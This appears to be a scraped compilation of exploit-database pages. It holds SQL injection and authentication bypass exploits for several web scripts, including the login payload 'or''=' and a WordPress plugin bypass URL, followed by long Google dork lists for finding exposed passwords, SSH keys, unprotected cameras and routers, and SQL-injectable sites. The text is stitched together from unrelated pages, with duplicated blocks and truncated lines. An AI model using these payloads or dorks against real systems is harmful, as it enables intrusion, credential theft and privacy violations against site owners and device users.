# Vendor Homepage: http://scripteen.com/

# Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html

# Demo: http://dwm.domainauctionsscript.com/

# Version: N/A

# Tested on: Win7 x64, Kali Linux x64

# # # # # 

# Exploit Author: Ihsan Sencan

# Author Web: http://ihsan.net

# Author Mail: ihsan[@]ihsan[.]net

# # # # #

# SQL Injection/Exploit :

# http://localhost/[PATH]/index.php?page=websites_for_sale&cat=[SQL]

# users :userId

# users :data

# users :payment_date

# users :expiration_date

# users :username

# users :password

# users :nume

# users :adresa

# Etc..

# # # # #

******************************************************************************************

# # # # # 

# Exploit Title: ICMusic - Music Site Script - Authentication Bypass

# Google Dork: N/A

# Date: 20.01.2017

# Vendor Homepage: http://www.icloudcenter.com/

# Software Buy: http://www.icloudcenter.com/music-site-script.htm

# Demo: http://icloudcenter.net/demos/icmusic/

# Version: 1.2

# Tested on: Win7 x64

# # # # # 

# Exploit Author: Ihsan Sencan

# Author Web: http://ihsan.net

# Author Mail : ihsan[beygir]ihsan[nokta]net

# # # # #

# Exploit :

# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.

# # # # #

***************************************************************************************

2017-11-30 intext:"/wp-content/uploads/wpsc/" Sensitive Directories

2017-11-29 inurl:"/address/speeddial.html?start" and intext:"Please configure the password" and intitle:"Brother" Various Online Devices

2017-11-29 inurl:"nfs://www." "index of /" Sensitive Directories

2017-11-28 intitle:index.of .bashrc Sensitive Directories

2017-11-28 inurl:"ews/setting/setews.htm" Various Online Devices

2017-11-27 intext:"index of /userfiles/file/" Sensitive Directories

2017-11-27 intext:"softperms.txt" ext:TXT

2013-09-24 -site:simplemachines.org "These are the paths... Dork: -site:simplemachines.org "These are the paths and URLs to your SMF installation&qu...

2011-08-25 allinurl:forcedownload.php?file= Didn't see this anywhere in the GHDB, but its been known for a while and widely abused by o...

2011-05-28 ionCube Loader Wizard information disclosure inurl:loader-wizard ext:php This dork displays sensitive information Auth0r: MaXe...

2011-05-27 vBulletin Install Page Detection inurl:/install/install.php intitle:vBulletin * Install System This dork displays the untreat...

2006-09-13 inurl:"simplenews/admin" hxxp://evuln.com/vulns/94/summary.html...

2006-02-28 inurl:updown.php | intext:"Powered by PHP Upl... this (evil ) script lets you to upload a php shell on target server, in most cases not password...

2005-12-19 inurl:guestbook/guestbooklist.asp "Post Date&... A sql vulnerability has been reported in a Techno Dreams asp script, login.asp. http://search.s...

2005-10-26 intitle:"CJ Link Out V1" A cross site scripting vunerability has been discovered in CJ linkout version 1.x. CJ linkout i...

2005-09-26 "powered by mailgust" MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takevorsoftware:site: http://w...

2005-09-26 "powered by my little forum" My Little Forum 1.5 / 1.6beta SQL Injectionsoftware:site: http://www.mylittlehomepage.net/my_li...

2005-09-25 intitle:"Control panel" "Control Pa... Build, manage and customize your own search engine friendly news / article site from scratch --...

2005-09-25 inurl:cartwiz/store/index.asp

2017-10-02 intitle:index.of intext:viewvc ViewVC is a browser interface for CVS and Subversion version control repositories. This dork a...

2017-08-07 "m.zippyshare.com/" maybe directory trick listener i dont know but useful :) type on google this this form.: &qu...

2017-07-17 index of /htdocs Which is used to find unauthorised web-servers,and find all sensitive info through 'htdocs' fo...

2017-06-26 intitle:"Index of /" "joomla_update... Finds directories with Joomla logs, often containing juicy info Dxtroyer...

2017-06-19 -inurl:htm -inurl:html intitle:"index of"... Explore the Images and photos uploaded and saved in Directories from Nikon DSLRs and Camera @R...

2017-06-19 -inurl:htm -inurl:html intitle:"index of"... Explore the Images and photos uploaded and saved in Directories from Canon DSLRs and Camera @R...

2017-05-08 inurl:"/drive/folders/" site:drive.googl... Google Drive folders -Xploit ...

2017-05-05 inurl:"folderview?id=" site:drive.google... Finds people's private folders on Google Drive Dxtroyer...

2017-05-05 "Index of" inurl:"/$Recycle.Bin/&qu...

2016-11-29 Hostinger © 2016. All rights reserved inurl:defaul... Google Dork: Hostinger © 2016. All rights reserved inurl:default.php Hostinger web hosting c...

2016-11-29 inurl:".esy.es/default.php" Dork: inurl:".esy.es/default.php" You can add “Here is a list of files in your pub...

2016-10-04 index:"html/js/editor/fckeditor/editor/filema... name =find liferay file page Google dork Description: index:"html/js/editor/fckeditor/ed...

2016-08-08 inurl:/FCKeditor/editor/filemanager/upload/ inurl:/FCKeditor/editor/filemanager/upload/ Let's you go through unprotected files in the FC...

2016-07-27 inurl:pictures intitle:index.of inurl:pictures intitle:index.of Loads of personal pictures and what not Sent from trump to...

2016-06-06 inurl:trash intitle:index.of One man's trash is another man's treasure. inurl:trash intitle:index.of Decoy...

2016-06-06 inurl:.ssh intitle:index.of authorized_keys SSH Keys inurl:.ssh intitle:index.of authorized_keys Decoy...

2016-05-10 inurl:/sites/default/files/webform/ Description: Drupal default web-forms' storage path, usually a lot of files there contains juic...

2016-04-21 intitle:Index of /__MACOSX ... MAC OS X. Parent Directory  Wordpress information. -Xploit ...

2016-03-22 (intext:"index of /.git") ("parent ... This dork will find git repository's which may have sensitive information. (intext:"ind...

2016-03-07 inurl:safm.asp ext:asp inurl:safm.asp ext:asp http://atawho.blogspot.com.tr/2016/03/simple-asp-filemanager.html ...

2016-01-06 intitle: Index of /awstats/data Awstats Log file's directory can reveal file/directory location These logs file may also revea...

2015-12-21 inurl:/server/webapps Google Search: inurl:/server/webapps Submission Date: 12/19/2015 Description: Apache Tomcat i...

2015-11-13 intitle:index.of.mail Dork with juicy info. Enjoy xD. Dork by Rootkit Pentester....

2015-11-11 inurl:pipermail intitle:index.of parent Pipermail Archives Decoy...

2015-11-11 inurl:"wp-content/uploads/private" Directories with juicy data. Dork by Rootkit Pentester....

2015-11-02 intitle:index.of inurl:grades site:edu Directories containing grades. Decoy...

2004-07-20 "index of" / picasa.ini Picasa is an 'Automated Digital Photo Organizer' recently aquired by Google. This search allows...

2004-07-16 index.of.password These directories are named "password." I wonder what you might find in here. Warning...

2004-10-31 inurl:explorer.cfm inurl:(dirpath|This_Directory) Filemanager without authentication....

2004-07-12 Index of phpMyAdmin phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web...

2004-06-14 filetype:cfg ks intext:rootpw -sample -test -howto Anaconda is a linux configuration tool like yast on suse linux. The root password is often encr...

2004-06-02 intitle:"album permissions" "Users ... Gallery (http://gallery.menalto.com) is software that allows users to create webalbums and uplo...

2004-06-01 "Index Of /network" "last modified&... Many of these directories contain information about the network, though an attacker would need ...

2004-05-13 intitle:intranet inurl:intranet +intext:"huma... According to whatis.com: "An intranet is a private network that is contained within an ent...

2004-05-11 inurl:/tmp Many times, this search will reveal temporary files and directories on the web server. The info...

2004-05-04 "index of" inurl:recycler This is the default name of the Windows recycle bin. The files in this directory may contain se...

2004-04-28 inurl:/pls/sample/admin_/help/ This is the default installation location of Oracle manuals. This helps in footprinting a serve...

2004-04-28 inurl:ojspdemos This directory contains sample Oracle JSP scripts which are installed on the server. These prog...

2004-04-28 inurl:j2ee/examples/jsp This directory contains sample JSP scripts which are installed on the server. These programs ma...

2004-04-23 "index of cgi-bin" CGI directories contain scripts which can often be exploited by attackers. Regardless of the vu...

2004-04-19 intitle:"Index of" cfide This is the top level directory of ColdFusion, a powerful web development environment. This dir...

2004-03-29 intitle:"index.of.personal" This directory has various personal documents and pictures....

2004-02-10 intitle:"Index of c:\Windows" These pages indicate that they are sharing the C:\WINDOWS directory, which is the system folder...

2003-08-12 "Welcome to phpMyAdmin" " Create ne... phpMyAdmin is a widly spread webfrontend used to mantain sql databases. The default security me...

2004-03-16 inurl:backup intitle:index.of inurl:admin This query reveals backup directories. These directories can contain various information rangin...

2003-06-27 index.of.password These directories are named "password." I wonder what you might find in here. Warning

2012-11-02 inurl:ckfinder intext:"ckfinder.html" in... Dork: inurl:ckfinder intext:"ckfinder.html" intitle:"Index of /ckfinder" ...

2011-11-19 inurl:/xampp this dork looks for servers with xampp installed...

2010-11-10 allintext:"WebServerX Server at" Quick and dirty WebserverX HTTP server google dork...

2010-11-10 intitle:index.of ios -site:cisco.com Google search for Cisco IOS images Author: fdisk...

2010-11-10 intitle:index.of cisco asa -site:cisco.com Google search for Pix/Asa images Author: fdisk...

2006-07-14 intitle:index.of.config These directories can give information about a web servers configuration. This should never be ...

2006-02-28 allintitle:"FirstClass Login" allintitle:"FirstClass Login" this is for firstclass directory listingsgo to http://[...

2006-01-16 inurl:install.pl intext:"Reading path paramat... Excelent information for foot holds. Everything from OS, to forum software, etc. Other exploits...

2005-12-01 "Warning: Installation directory exists at&qu... by this dork you can find fresh installations of Zen-Cartsee Full Disclosure forums fore detail...

2005-11-28 "Welcome to the directory listing of" &q... this is for NetworkActiv-Web-Server directory listing...

2005-11-11 log inurl:linklint filetype:txt -"checking&qu... Linklint is an Open Source Perl program that checks links on web sites. This search finds the L...

2005-09-26 "Directory Listing for" "Hosted by ... directory listing for Xerver web server...

2005-09-26 intitle:"Folder Listing" "Folder Li... directory listing for Fastream NETFile Web Server...

2005-09-13 intitle:"Backup-Management (phpMyBackup v.0.4... phpMyBackup is an mySQL backup tool, with features like copying backups to a different server u...

2005-07-21 intitle:"pictures thumbnails" site:pictu... This search reveals the photo albums taken by Sprint PCS customers. Pictures taken with Sprint'...

2005-05-02 intitle:index.of WEB-INF Finds java powered web servers which have indexing enabled on their config directory...

2005-03-26 intitle:index.of /maildir/new/ search gives you a mailbox dir. Contains a lot of mails....

2005-02-17 filetype:ini Desktop.ini intext:mydocs.dll This dork finds any webshared windows folder inside my docs. You can change the end bit "i...

2005-01-16 filetype:torrent torrent Torrent files .. don't expect to find spectacular stuff with this kind of string, this just to ...

2005-01-09 "Index of" rar r01 nfo Modified 2004 New Warez Directory Lists...

2005-01-07 "Web File Browser" "Use regular exp... This will ask google to search for a php script used to manage files on a server. The script &q...

2005-01-05 intitle:"HFS /" +"HttpFileServer&qu... "The HttpFileServer is a Java based mechanism for providing web access to a set of files o...

2005-01-01 intitle:upload inurl:upload intext:upload -forum -... The search reveals server upload portals.An attacker can use server space for his own benefit....

2004-12-30 intitle:"index of" inurl:ftp (pub | inco... Adding "inurl:ftp (pub | incoming)" to the "index.of" searches helps locati...

2004-12-29 allinurl:"/*/_vti_pvt/" | allinurl:"... Frontpage extensions for Unix ? So be it.....

2004-12-19 intitle:index.of abyss.conf These directories reveal the configuration file of the abyss webserver. These files can contain...

2004-12-19 intitle:"Index of /CFIDE/" administrator With ColdFusion, you can build and deploy powerful web applications and web services with far l...

2004-12-19 "Powered by Invision Power File Manager"... Invision Power File Manager is a popular file management script, written in the popular PHP Scr...

2004-12-05 intitle:"index of" "parent director... This search uses desktop.ini to track users with a webserver running on their desktop computers...

2004-11-28 intext:"Powered By: TotalIndex" intitle:... TotalIndex v2.0 is an open source script that is designed to replace the simple, and boring def...

2004-11-07 "intitle:Index.Of /" stats merchant cgi-... This search looks for indexes with the following subdirectories: stats, merchant, online-store ...

2004-10-31 intitle:"index of" intext:"content.... This dork indicates the "Local settings" dir in most cases, and browseble server dire...

2004-10-20 intitle:"index of" -inurl:htm -inurl:htm... Yes! I probably have should have told you guys earlier, but this is how ive been getting 100% o...

2004-10-25 index.of.dcim The DCIM directory is the default name for a few brands of digital camers. This is not a big ne...

2004-10-19 intitle:"Directory Listing For" intext:T... The Google Stackers Guide explains how to find Apache directory indexes, which are the most comm...

2004-09-24 intitle:"webadmin - /*" filetype:php dir... Webadmin.php is a free simple Web-based file manager. This search finds sites that use this sof...

2004-09-21 intitle:index.of (inurl:fileadmin | intitle:filead... TYPO3 is a free Open Source content management system for enterprise purposes on the web and in...

2004-09-10 intitle:"Index of *" inurl:"my shar... These are index pages of "My Shared Folder". Sometimes they contain juicy stuff like ...

2004-08-26 intitle:index.of /AlbumArt_ Directories containing commercial music.AlbumArt_{.*}.jpg are download/create by MS-Windows Med...

2004-08-05 intext:"d.aspx?id" || inurl:"d.aspx... "The YouSendIt team was formed to tackle a common problem: secure transmission of large do...

2015-06-30 intitle:"Index of" "wwwroot" Directory of wwwroot Dork. Enjoy xD. By Rootkit....

2015-06-17 intitle:"index of" inurl:"no-ip.com... # Exploit Title: intitle:"index of" inurl:"no-ip.com" # Google Dork: intit...

2015-06-17 intitle:"Index Of" intext:"iCloud P... From: Creep Mode Baby...

2015-06-10 inurl:private_files Directory private files xD. By Rootkit....

2015-06-04 intitle:"index of" "onetoc2" &... # Exploit Title: intitle:"index of" "onetoc2" "one" # Google Dor...

2015-05-27 inurl:wp-admin/ intext:css/ The dork finds misconfigured WordPress sites. Author:NickiK....

2015-05-26 intitle:"Index of ftp" This dork finds open ftps. This is a base dork, where you can add intext:"ssh/" for ...

2015-04-23 intitle:index.of.dropbox Sensitive Directories Ariel Anonis - @ariel_anonis...

2015-04-03 intitle:index.of.accounts Dork for directory with accounts. By Rootkit....

2015-04-03 intitle:index.of +"Indexed by Apache::Gallery... Google dork for finding Private pics ;) :D #13lacKDemOn...

2015-02-27 inurl:/wp-content/wpbackitup_backups Relates to https://wordpress.org/plugins/wp-backitup/ Sensitive data/site rips/db rips in pu...

2015-02-19 "Config" intitle:"Index of" in... Directory with keys of vpn servers. By Rootkit....

2015-02-11 "jos_users" intitle:"Index of" "jos_users" intitle:"Index of" Files of configuration of user Joomla serve...

2015-01-06 inurl:/cgi-bin/.cgi Finds open index of /cgi-bin....

2014-02-05 allinurl:/hide_my_wp= i just found a google dork that is file/path disclosure of Hide My WP plugin Google dork -...

2013-11-25 intitle:"index of" intext:".ds_stor... Mac OSX directories -- -[Voluntas Vincit Omnia]- website http://www.erisresearch.org/ Go...

2013-09-24 intitle:"index of" myshare Google search for shared HDD directories or shared directories on servers. Gives access to oft...

2013-08-08 inurl:8080 intitle:"Dashboard [Jenkins]" #Summary: Acces to Jenkins Dashboard #Author: g00gl3 5c0u7...

2013-08-08 intitle:index.of intext:.bash_history the GHDB on subject (intitle:index.of intext:.bash_history) finds all home users directory pat...

2013-08-08 intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0j... # Exploit Title: google dork for apache directory listing by url edit # Google Dork: intext:xa...

2013-04-09 "index of" inurl:sym Google Dork: "index of" inurl:sym You can Steal the symlinks of other Servers A...

2013-04-09 "index of" inurl:root intitle:symlink Google Dork: index of" inurl:root intitle:symlink Steal Others Symlink Author: Un0wn...

Various Online Devices

This category contains things like printers, video cameras, and all sorts of cool things found on the web with Google.

Search

Search

<< prev 1 2 3 4 5 6 7 8 9 next >>

Date Title Summary

2017-11-29 inurl:"/address/speeddial.html?start" an... The following dork gives the list of Brother Printers whose panels do not have an administrator...

2017-11-28 inurl:"ews/setting/setews.htm" The google dork leads to various Dell/DocuPrint printers whose authentication is not set. An ...

2017-11-24 "Use these fields to set or change the Admini... The following Google search gives output of HP printers whose authentication is not set. Hence...

2017-10-23 inurl:"set_config_networkIPv6.html" Finds lots of HP colour printers hooked up to the internet Dxtroyer ...

2017-10-23 inurl:guestimage.html Mobotix cameras online. By Rootkit Pentester. ...

2017-08-15 inurl:share.cgi?ssid= This dork show myQnap cloud servers files and folder shared. Have Fun!!!. Rootkit Pentester...

2017-08-14 inurl:"img/main.cgi?next_file" Dork that allows us to find online cameras, be it security, webcams, etc. inurl:"img/ma...

2017-07-31 inurl:scgi-bin intitle:"NETGEAR ProSafe" NETGEAR ProSafe Dual WAN Gigabit Firewall. Default username: admin. Default password: password ...

2017-07-31 intitle:"twonky server" inurl:"9000... Finds Twonky media-sharing servers Dxtroyer...

2017-07-31 inurl:"/api/index.php" intitle:UniFi Finds the UniFi API browser with juicy Information such as WiFi passwords redstoner2014 ...

2017-07-27 intitle:"Namenode information" AND inurl... NameNode Storage Information for Infrastructure Hadoop ------------------------------ Ing. ...

2017-07-20 intitle:"GitBucket" intext:"Recent ... Dork: intitle:"GitBucket" intext:"Recent updated repositories" intext:"...

2017-07-20 intitle:"cuckoo sandbox" "failed_re... Dork: intitle:"cuckoo sandbox" "failed_reporting" Description: Find open C...

2017-07-14 inurl:login.cgi intitle:NETGEAR inurl:login.cgi intitle:NETGEAR To find GSS108E ProSAFE PoE+ Click Switches online. Often...

2017-07-14 inurl:"/ap/recuperadocumentossql.aspx" AuraPortal: Internal file disclosure...

2017-07-14 intitle:"Namenode information" Finds unpassworded file systems just waiting to be exploited. Dxtroyer...

2017-07-14 inurl:"/ADVANCED/COMMON/TOP" Finds unpassworded Epson printers Dxtroyer...

2017-06-20 inurl:"g2_view=webdav.WebDavMount" inurl:"g2_view=webdav.WebDavMount" Finds sites with WebDAV enabled TPNight...

2017-06-14 intitle:"Setup Home" "Internet Stat... Finds lots of internet-connected Arris routers Dxtroyer...

2017-06-13 inurl:"ftp://www." "Index of /"... Finds various online FTP servers. Dxtroyer...

2017-06-09 inurl:"8080/jmx-console" This dork will list all unauthenticated jboss servers with jmx-console access. -- ?smail ...

2017-06-05 intitle:"webcamXP 5" -download Finds WebcamXP cameras Dxtroyer...

2017-05-31 inurl:"http://ftp.dlink" This dork allows us to find lists of FTP directories of D-Link routers inurl:"http://ft...

2017-05-12 inurl:"/view/view.shtml?id=" Finds Axis IP cameras Dxtroyer...

2017-05-12 intitle:"Welcome to ZyXEL" -zyxel.com Finds ZyXEL routers, IP cameras, and other devices Dxtroyer...

2017-05-11 (site:onion.link | site:onion.cab | site:tor2web.o... Finds sites hosted on the Tor network accessible with Tor2Web servers Dxtroyer...

2017-05-10 inurl:"http://voicemail." Various voicemail servers like Cisco Unity Messaging....

2017-05-10 inurl:"this.LCDispatcher?nav=" Finds HP printers connected to the internet Dxtroyer...

2017-05-10 inurl:"multimon.cgi" intitle:"UPS&q... Finds live traffic monitors, telling you who's online Dxtroyer...

2017-05-09 inurl:"lvappl.htm" Finds live cameras connected to servers on the internet (mostly security cams) Dxtroyer...

2017-05-04 intext:VIEWS · Server: - Database: information_sch... Description : This google dork can access many websites phpmyadmin web server. Google dork: in...

2017-04-19 inurl:"/HtmlAdaptor?action=" JBoss JMX-Console MBean Viewer Here are also more dorks.  intitle:JMX MBean View inurl:/j...

2017-03-08 inurl:cgi-bin/lsnodes_web?node Dork for status node of radios online. Dork by Rootkit Pentester....

2017-02-08 inurl:"/graphs" intext:"Traffic and... View results for mikrotik graphics interfaces inurl:"/graphs" intext:"Traffic...

2017-01-23 inurl:~/ftp://193 filetype:(php | txt | html | asp... Dork: Find a List of FTP Servers by IP address, mostly Windows NT servers with guest login ca...

2017-01-12 inurl:cgi-bin "ARRIS Enterprises" Dork for Panels ARRIS Router. Enjoy healthy. Dork made by Rootkit Pentester....

2017-01-09 inurl:"/viewlsts.aspx?BaseType=" SharePoint Files  Also, inurl:"/mWord.aspx?doc=" inurl:"/mXL.aspx?doc=%2"...

2017-01-05 "All site content" ext:aspx Dork for locate Sharepoint Administration webs. Enjoy healthy. Dork made by Rootkit Pentester...

2016-12-16 inurl:"/html/modeminfo.asp? at&t and NetGear router information. Also inurl:"/html/login.asp?" intext:"...

2016-12-14 intitle:"Log In to AR Web" Huawei AR Routers login panels Google Dork: intitle:"Log In to AR Web" Date: 2016-1...

2014-05-06 inurl:"/public.php?service=files" Search for shared files from ownCloud Daniel Maldonado http://caceriadespammers.com.ar...

2014-02-05 intitle:not accepted inurl:"union+select"... Find IDS and Mod security dork: intitle:not accepted inurl:"union+select" inurl:...

2013-11-25 filetype:jnlp Java Web Start (Java Network Launch Protocol) -- -[Voluntas Vincit Omnia]- website http:/...

2013-11-25 intitle:"RT at a glance" intext:"qu... RT Request Tracker Ticket Database http://www.bestpractical.com/rt/ -- -[Voluntas Vincit ...

2013-11-25 intitle:"IPCam Client" Foscam IPCam By default these cameras attach to the myfoscam.org DDNS. So you could add sit...

2013-09-24 inurl:*/graphs* intitle:"Traffic and system r... With this search you can view results for mikrotik graphics interfaces *Obrigado,*...

2013-09-24 intitle:"Web Client for EDVS" Yet another DVR system. Probably requires Java to display. 4N6 Security...

2013-09-24 inurl:"/webcm?getpage=" Returns various Actiontec (and often Qwest) branded routers' login pages. 4N6 Security...

2013-09-24 intitle:"RouterOS router configuration page&q... Returns login portals for Microtik routers running RouterOS version 5 and up. 4N6 Security...

2013-09-24 inurl:"/cgi-mod/index.cgi" Returns login pages for various Barracuda Networks branded hardware spam filters and mail arch...

2013-09-24 intitle:"SPA504G Configuration" Dork : intitle:"SPA504G Configuration" Result : Gives access to Cisco SPA504G Config...

2013-08-08 intitle:"Web Image Monitor" & inurl:... #Summary: Several printers that use "Web Image Monitor" control panel ( http://ricoh...

2013-08-08 intitle:"Transponder/EOL Configuration:"... #Summary: Cheeta Technologies Transponder Configuration Portal (* http://www.cheetahtech.com)....

2013-08-08 intitle:"NetBotz Network Monitoring Appliance... #Summary:Various Online Divices #Category: Pages containing login portals #Author: g00gl3 5c0...

2013-08-08 intitle:"Weather Wing WS-2" #Summary:Weather Wing (http://www.meteo-system.com/ws2.php) Portal. #Category: Various Online ...

2013-04-22 inurl:/voice/advanced/ intitle:Linksys SPA configu... This allows you to look at linksys VOIP Router Config pages. ...

2013-02-05 inurl:/control/userimage.html Mobotix webcam search. yet another newer search...

2012-11-02 inurl:"Orion/SummaryView.aspx" intext:&q... Hello, Enumerate Solarwinds Orion network monitoring portals. In some cases, the portal can...

2012-11-02 inurl:"/level/13|14|15/exec/" inurl:"/level/13|14|15/exec/" Cisco IOS HTTP Auth Vulnerability .. Command before ...

2012-11-02 intitle:"dd-wrt info" intext:"Firmw... This dork finds web interfaces of various routers using custom firmware DD-WRT. Default login...

2012-11-02 inurl:32400/web/index.html Submitting this for the GHDB. These are web accessible Plex Media Servers where you can watch/...

2012-11-02 intitle:"Pyxis Mobile Test Page" inurl:&... Pyxis Mobile Test Page intitle:"Pyxis Mobile Test Page" inurl:"mpTest.aspx&qu...

2012-08-21 'apc info' 'apc.php?SCOPE=' This dork will locate Unsecured PHP APC Installations. With regards, Shubham Mittal (Stack ...

2012-08-21 intext:"You may also donate through the Money... Still find alot of equipment running v24 sp1 ...

2012-08-21 intitle:"hp laserjet" inurl:info_configu... HP LaserJet printers...

2012-05-15 inurl:Settings.aspx intitle:Beyond TV Beyond TV gives you the capability to turn your PC into a high quality, digital video recorder...

2012-05-15 intitle:"HtmlAnvView:D7B039C1" This dork finds Wireless Security/Webcams that are accessible from the web. The interesting p...

2011-12-28 inurl:cgi-bin/cosmobdf.cgi? COSMOView for building management. Author: GhOsT-PR...

2011-12-27 inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inu... Gateway Routers Author: GhOsT-PR...

2011-12-26 intitle:SpectraIV-IP Google dork for pelco SpectraIV-IP Dome Series cameras Default username/password "admin/a...

2011-12-12 inurl:/cgi-bin/makecgi-pro Brings up listings for Iomgea NAS devices. Password protected folders are susceptible to authe...

2011-12-10 allintitle:"UniMep Station Controller" UniMep is a device for managing fuel station. You can see process of fueling cars and you can ...

2011-07-26 inurl:":9000" PacketVideo corporation inurl:":9000" PacketVideo corporation About: This provides Twonky Server Media int...

2010-11-21 inurl:/level/15/exec/- Default Cisco 2800 Series page...

2010-11-21 inurl:/exec/show/tech-support/cr Default Cisco 2800 Series page...

2010-11-21 inurl:/level/15/exec/-/configure/http Default Cisco 2800 Series page...

2010-11-11 allintitle:"SyncThru Web Service" This search finds Internet-connected Samsung printer control panels....

2010-11-10 intitle:”EvoCam” inurl:”webcam.html” This search identifies EvoCam cameras accessible over the Internet. There are also public explo...

2006-10-02 intitle:Top "Vantage Service Gateway" -i... VSG1200 Vantage Service Gateway (topframe), go up one level for the login page. Vendor page at ...

2006-10-02 intitle:"Net2Phone Init Page" Net2Phone CommCenter® is software that allows you to make phone calls and send faxes to..

*************************************************************************

# Exploit Title: Userpro – WordPress Plugin – Authentication Bypass

# Google Dork: inurl:/plugins/userpro

# Date: 11.04.2017

# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)

# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9

# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9

# Version: <= 4.6.17

# Tested on: Wordpress 4.8.3

# CVE : requested, not assigned yet.

Description

================================================================================

 The userpro plugin has the ability to bypass login authentication for the user

 'admin'. If the site does not use the standard username 'admin' it is not affected.

PoC

================================================================================

1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in

will full administrator access.

================================================================================

10/25/2017 – Wordfence notified of issue by Iain Hadgraft.

10/26/2017 – Vendor resolved the issue in the plugin.

11/04/2017 - Disclosure.

**********************************************************************************

# Exploit Title: Userpro – WordPress Plugin – Authentication Bypass

# Google Dork: inurl:/plugins/userpro

# Date: 11.04.2017

# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)

# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9

# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9

# Version: <= 4.6.17

# Tested on: Wordpress 4.8.3

# CVE : requested, not assigned yet.

Description

================================================================================

 The userpro plugin has the ability to bypass login authentication for the user

 'admin'. If the site does not use the standard username 'admin' it is not affected.

PoC

================================================================================

1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in

will full administrator access.

================================================================================

10/25/2017 – Wordfence notified of issue by Iain Hadgraft.

10/26/2017 – Vendor resolved the issue in the plugin.

11/04/2017 - Disclosure.

********************************************************************************************************

inurl:/careers-detail.asp?id=

inurl:/WhatNew.asp?page=&id=

inurl:/gallery.asp?cid=

inurl:/publications.asp?type=

inurl:/mpfn=pdview&id=

inurl:/reservations.php?id=

inurl:/list_blogs.php?sort_mode=

inurl:/eventdetails.php?*=

inurl:/commodities.php?*id=

inurl:/recipe-view.php?id=

inurl:product.php?mid=

inurl:view_ad.php?id=

inurl:/imprimir.php?id=

inurl:/prodotti.php?id=

inurl:index.cgi?aktion=shopview

inurl:/default.php?id=

inurl:/default.php?portalID=

inurl:/*.php?id=

inurl:/articles.php?id=

inurl:/os_view_full.php?

inurl:/Content.asp?id=

inurl:/CollectionContent.asp?id=

inurl:/Details.asp?id=

intext:"Powered By : SE Software Technologies" filetype:php

inurl:/index.php?pgId=

inurl:/index.php?PID= "Powered By Dew-NewPHPLinks v.2.1b"

inurl:/dosearch.asp?

inurl:/details.php?linkid=

inurl:/viewfaqs.php?cat=

inurl:/calendar.php?token=

inurl:/games.php?id= "Powered by PHPD Game Edition" 

inurl:/gmap.php?id=

allinurl:*.php?txtCodiInfo=

inurl:/notizia.php?idArt=

inurl:read.php?=

inurl:"ViewerFrame?Mode="

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:Stray-Questions-View.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:ogl_inet.php?ogl_id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:opinions.php?id=

inurl:spr.php?id=

inurl:pages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurl:participant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurl:prod_detail.php?id=

inurl:viewphoto.php?id=

inurl:article.php?id=

inurl:person.php?id=

inurl:productinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=

inurl:gallery.php?id=

inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurl:profile_view.php?id=

inurl:category.php?id=

inurl:publications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurl:prod_info.php?id=

inurl:shop.php?do=part&id=

inurl:productinfo.php?id=

inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurl:product.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurl:produit.php?id=

inurl:pop.php?id=

inurl:shopping.php?id=

inurl:productdetail.php?id=

inurl:post.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurl:page.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:transcript.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=

inurl:trainers.php?id=

inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:newsone.php?id=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

